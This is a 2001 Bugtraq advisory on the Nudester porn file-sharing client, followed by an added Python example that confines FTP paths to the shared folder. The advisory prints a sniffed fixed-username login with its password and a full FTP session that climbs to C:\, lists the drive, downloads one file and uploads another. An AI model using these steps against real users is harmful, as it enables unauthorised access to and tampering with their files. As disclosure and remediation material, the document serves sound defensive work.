[Real Security] Advisory for Nudester 1.10
daemon@ATHENA.MIT.EDU (Gary)
Fri Aug 17 10:56:51 2001
Message-ID: <004801c126ca$27eac0b0$4f99f4cc@cyph3r>
From: "Gary" <Cyph3r@phreaker.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 16 Aug 2001 20:10:22 -0700
<------------------------->
[Real Security Advisory #1]
[ Author: Cyph3r ]
[ www.Real-Security.org ]
[ Date: 08/16/2001 ]
<------------------------->
[Vulnerable: ]
[Nudester 1.10(and below?)]
[ OS: Win9x/me/2k/nt/xp ]
[ Site: www.nudester.org ]
<------------------------->
-> Severity: Malicious users can gain full access to the user's files
(upload/download)
-> Overview: Nudester, a file sharing program for porn, uses the FTP protocol
to transfer files.
The problem is it gives access to the whole hard disk instead of just the
folder containing porn.
Example:
Open Nudester and a sniffer program, e.g. Iris (www.eeye.com), and download a
file from a user on Nudester
while having the sniffer running filtering port 21 inclusive, so you can get
the password.
<Sniffed Data>
220 ICS FTP Server ready
user NUDESTER
331 Password required for NUDESTER
pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in
</Sniffed data>
Open an ftp client and connect to the ip
ftp> open ***.***.***.***
Connected to ***.***.***.***
220 ICS FTP Server ready.
User (***.***.***.***:(none)): NUDESTER
331 Password required for NUDESTER.
Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in.
- Bingo!
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> DIR
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
-rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
-rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
-rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
-rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
-rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
-rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
-rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
-rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
-rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
-rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
-rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
-rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
-rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
-rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
-rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
-rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
-rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
-rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
-rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
-rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
-rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
-rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
-rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
-rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
-rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
-rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
-rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
-rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
-rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
-rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
226 File sent ok
ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
- Let's see if we have access to download a file
ftp> get netsig.txt
200 Port command successful.
150 Opening data connection for netsig.txt.
226 File sent ok
ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
- Yep, let's try to upload a file
ftp> put c:\temp.txt
200 Port command successful.
150 Opening data connection for TEMP.TXT.
226 File received ok
-> Conclusion: anyone can gain full access to a Nudester user's files; the
username is the same for every user.
However, the password is not the same; you will have to sniff while
downloading a file to retrieve the password.
The only solution to this problem is not to use Nudester.
-> Credits: Cyph3r - Cyph3r@phreaker.net
-> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
spasms, trew, zeronine, matt, shizniz, z0mb1e
b0b, neonfreon, dragnet, c0de, spiked and anyone else I missed.
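The root cause shown in the transcript is that the FTP daemon resolves client paths against the whole drive, so "cd .." from C:\TEMP lands in C:\ and every file on the disk becomes readable and writable. The following is an added example, not code from this advisory or from Nudester, of the server-side check such a file-sharing daemon needs: a resolver that maps every client path into a virtual tree whose top is the shared folder and refuses anything that would climb above it. The share root C:\TEMP and the replayed commands come from the session above; the function and class names, and the session list, are my own constructions.

```python
import ntpath


class PathEscape(Exception):
    """Raised when a client-supplied path would climb above the share root."""


def resolve_within_share(share_root, cwd, requested):
    """Map an FTP client path onto the shared folder and refuse escapes.

    share_root: the only directory the daemon may expose, as an absolute
                Windows path (e.g. C:\\TEMP).
    cwd:        the session's current directory in the virtual tree, where
                "/" is the top of the share (what the client gets at login).
    requested:  the raw argument of CWD/RETR/STOR/LIST as the client sent it.

    Returns (virtual_path, real_path): the virtual path is what the client is
    told in replies such as '"/" is current directory', the real path is what
    the daemon actually opens. Raises PathEscape rather than ever producing a
    real path outside share_root. The check is purely lexical; a daemon on a
    filesystem with links or junctions must also canonicalise the real path.
    """
    root = ntpath.normpath(share_root)

    # Clients may send either separator; treat them the same.
    req = requested.replace("\\", "/")
    # A drive or UNC prefix ("C:", "//srv/share") names another volume, which
    # the share never contains, so it is dropped rather than honoured.
    _, req = ntpath.splitdrive(req)

    # An absolute client path starts at the share top, not at the disk root.
    parts = [] if req.startswith("/") else [c for c in cwd.split("/") if c]
    for comp in req.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                # This is exactly the "cd .." from C:\TEMP to C:\ in the advisory.
                raise PathEscape(f"{requested!r} would leave the share root")
            parts.pop()
        else:
            parts.append(comp)

    virtual = "/" + "/".join(parts)
    real = ntpath.join(root, *parts)

    # Belt and braces: the walk above should make this impossible, but an
    # independent second check on the real path costs nothing.
    if ntpath.commonpath([root, real]).lower() != root.lower():
        raise PathEscape(f"{requested!r} resolved outside {root}")
    return virtual, real


def is_confined(share_root, cwd, requested):
    """True if the request stays inside the share, False if it would escape."""
    try:
        resolve_within_share(share_root, cwd, requested)
        return True
    except PathEscape:
        return False


def replay_session(share_root, commands):
    """Replay (cwd, argument) pairs the way the advisory's session went and
    report what a confined server would have answered for each."""
    results = []
    for cwd, arg in commands:
        try:
            virtual, real = resolve_within_share(share_root, cwd, arg)
            results.append((arg, "OK", virtual, real))
        except PathEscape:
            results.append((arg, "REFUSED", None, None))
    return results


if __name__ == "__main__":
    # Constructed replay of the transcript above: share root C:\TEMP, client
    # starts at "/", tries "cd ..", then asks for netsig.txt and TEMP.TXT,
    # plus two further escape attempts a confined server must handle.
    SESSION = [("/", ".."), ("/", "netsig.txt"), ("/", "TEMP.TXT"),
               ("/", "C:/WINDOWS"), ("/sub", "../FRUNLOG.TXT")]
    for arg, verdict, virtual, real in replay_session(r"C:\TEMP", SESSION):
        print(f"{arg!r:20} {verdict:8} {virtual or '':14} {real or ''}")
```

With this in place the "cd .." at the top of the share is refused, "C:/WINDOWS" is read as the share's own WINDOWS subfolder rather than the system directory, and the two transfers the advisory performed still work inside C:\TEMP. Confinement limits what a stolen password can reach; it does nothing about the password itself, which FTP still sends in the clear on port 21 as the sniffed data shows.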